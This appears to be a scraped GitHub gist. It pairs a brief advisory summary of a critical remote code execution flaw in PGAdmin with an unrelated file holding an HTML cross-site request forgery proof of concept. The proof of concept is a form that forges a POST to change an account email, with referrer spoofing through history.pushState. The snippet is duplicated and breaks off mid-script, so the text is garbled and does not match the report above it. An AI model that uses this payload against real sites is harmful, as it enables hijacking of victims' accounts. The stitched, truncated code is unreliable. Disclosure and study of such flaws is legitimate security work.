Ayoub ELMOKHTAR aelmokhtar

## pgadmin_rce-10-03-2024.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              3 stars
            
          
                aelmokhtar
                / pgadmin_rce-10-03-2024.md
            
            
              Last active
              April 9, 2024 10:33
            
          
    Critical Remote Code Execution Vulnerability in PGAdmin: Detailed Analysis Report

This report presents a critical Remote Code Execution (RCE) vulnerability within PGAdmin, discovered during a security review. This vulnerability allows attackers to execute arbitrary code on the server hosting PGAdmin, posing a severe risk to both the database management system's integrity and the security of the underlying data.
Checkout more technical details on https://ayoubmokhtar.com/post/remote_code_execution_pgadmin_8.4-cve-2024-3116/

  
## csrf_poc.txt
<html>
<meta name="referrer" content="unsafe-url">
<body>
    <form id="myForm" action="https://example.com/email/change" method="POST" onsubmit="event.preventDefault(); openTabAndSubmit();">
    <input type="email" name="email" value="test@test.com" />
    <input type="submit" value="Submit request" />
    </form>
    <script>
        history.pushState("", "", "/?example.com");
	<html>
	<meta name="referrer" content="unsafe-url">
	<body>
	<form id="myForm" action="https://example.com/email/change" method="POST" onsubmit="event.preventDefault(); openTabAndSubmit();">
	<input type="email" name="email" value="test@test.com" />
	<input type="submit" value="Submit request" />
	</form>
	<script>
	history.pushState("", "", "/?example.com");